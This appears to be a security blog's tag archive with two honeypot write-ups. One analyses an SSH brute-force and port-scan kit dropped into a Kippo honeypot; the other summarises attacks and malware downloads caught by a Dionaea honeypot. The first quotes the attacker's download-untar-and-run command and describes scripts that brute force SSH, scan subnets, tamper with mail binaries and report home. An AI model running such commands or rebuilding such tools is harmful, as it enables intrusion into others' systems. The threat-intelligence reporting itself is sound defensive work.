Skip navigation

Tag Archives: malware

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.


1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

– a213ebd69fbc11d612d0374b373f65d8
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

– the user:pass permutations from ‘’

– cbf0f41bbbafb1c2609bedb943be3b36

– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

– contains the results from ‘a’

– gathers system information, saves it to ‘info2’, mails it to
– given the first 3 quarters of an IP address, executes ‘a’ on each of the 255 addresses within that space
– periodically, the results are mailed home to
– the author has also never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

    Wall of Shame:

Attack Source:
Malware Host:
Malware Type: portscan / bruteforce
Phones Home: /

Over a slow weekend, I decided to make my first attempt at running a Dionaea honeypot to catch some malware samples to play with. Armed with this simple guide and a micro Amazon EC2 instance, the whole thing was up and running in well under an hour. For my first attempt, I stuck with the default configuration. I imagine there’s a lot of improvements and tweaks that I entirely missed.

It didn’t take long to start getting hits, and after three days I stopped. The honeypot had produced a 6.1gb log, and the instance was beginning to complain that there was no space left on the drive to write to. I had managed to snag three binaries:


It had been surveyed by 2387 unique IP addresses over 10 different protocols. However, I found that all three binaries on the system were the responsibility of one hacker (group?), originating from a Ukrainian IP address.

We can see the connections here:

Time                  Protocol      Local Port   Remote IP
2012-09-19 17:43:49   smbd          445
2012-09-19 17:43:49   smbd          445
2012-09-19 17:43:52   remoteshell   1957
2012-09-19 19:15:52   smbd          445
2012-09-19 19:15:52   smbd          445
2012-09-19 19:15:56   remoteshell   1957

And here we have the downloads:

URL                            md5
hxxp://    9b9df225dfc4b43c727b9177e9eb0678
txxp://  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://  47b2e95136e660522067221ae405025c

The next interesting point is the urls in the log. The majority of urls captured seemed primarily used for spam. Some quick stats:

3059 mail login attempts
293845 advertisement urls
71 forum registrations

Next up, fun with Kippo.